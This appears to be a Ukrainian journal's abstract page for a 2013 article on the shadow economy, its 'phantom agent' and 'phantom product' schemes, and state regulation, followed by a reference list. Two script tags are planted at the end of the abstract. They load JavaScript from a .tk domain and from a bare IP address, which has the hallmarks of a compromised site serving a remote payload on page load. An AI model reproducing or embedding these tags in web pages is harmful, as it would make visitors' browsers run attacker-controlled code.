ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.2(477)
Проблеми економічної теорії

Тіньова економіка: структура, зміст та особливості функціонування / Мороз О.В., Семцов В. М. // Економіка АПК. - 2013. - № 5 - С. 96

Стаття присвячена особливостям функціонування тіньової економіки в Україні. Визначено та доведено основні складові тіньової економіки. Особливий акцент зроблено на розгляді сучасних тіньових схем. Проаналізовано діяльність підприємств та/або організацій Вінницької області, при цьому виявлено, що найбільш поширеними схемами прояву фіктивної економіки є: схема – "агент-примара" та схема – "продукція-примара". Встановлено, що система боротьби з тіньовою економікою, яка грунтується лише на формальному регламентуванні правил і норм (законодавства), призводить до ірраціональних рішень та витрат ресурсів. Продемонстровано основні недоліки державного регулювання економіки, обґрунтовано доцільність посилення кримінальної відповідальності за економічні злочини. Запропоновано пропозиції щодо вдосконалення системи боротьби з тіньовою економікою. Рис.: 4. Бібліогр.: 8.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: агент, тіньова економіка, економічна безпека, державне регулювання економіки, модель, опортунізм

Список використаних джерел

  1. Авдийский В.И. Теневая экономика и экономическая безопасность государства: учеб. пособие / В. И. Авдийский, В. А. Дадалко. – 2-е изд., доп. – М. : Альфа-М : Инфра-М, 2010. – 496 с.
  2. Бренделева Е. А. Неоинституциональная экономическая теория : учеб. пособие / Е. А. Бренделева. – М.: Дело и Сервис, 2006. – 352 с.
  3. Криворотов В. В. Экономическая безопасность государства и регионов : учеб. пособие / В. В. Криворотов, А. В. Калина, Н. Д. Эриашвили. – М.: ЮНИТИ-ДАНА, 2011. – 352 с.
  4. Латов Ю. В. Теневая экономика: учеб. пособие для вузов / Ю. В. Латов, С. Н. Ковалев; под ред.: В. Я. Кикотя, Г. М. Казиахмедова. – М.: Норма, 2006. – 336 с.
  5. Мандибура В. О. "Тіньова" економіка України та напрями законодавчої стратегії її обмеження: наук. вид. / В. Мандибура. – К.: Парламентське вид-во, 1998. – 136 с.
  6. Україна. Закони. Про внесення змін до деяких законодавчих актів України щодо гуманізації відповідальності за правопорушення у сфері господарської діяльності: Закон…від 15.11.2011 р. № 4025-VI [Електронний ресурс]: Офіц. сайт Верхов. Ради України. – Режим доступу: http://zakon1.rada.gov.ua/laws/show/4025-17/page.
  7. Інформація про вступ працівників ДП "Гайсинський спиртовий завод" у колективний трудовий спір [Електрон-ний ресурс]: Офіц. сайт Вінницької обласної Державної адміністрації від 20.08.2012 р. – Режим доступу : http://www.vin.gov.ua/web/vinoda.nsf/web_alldocs/DocXCHKE.
  8. Schneider F. The Shadow Economy: An International Survey / Schneider F., Enste D. – Cambridge University Press, 2003. – 238 p.
Читати статтю: 13_05_16.pdf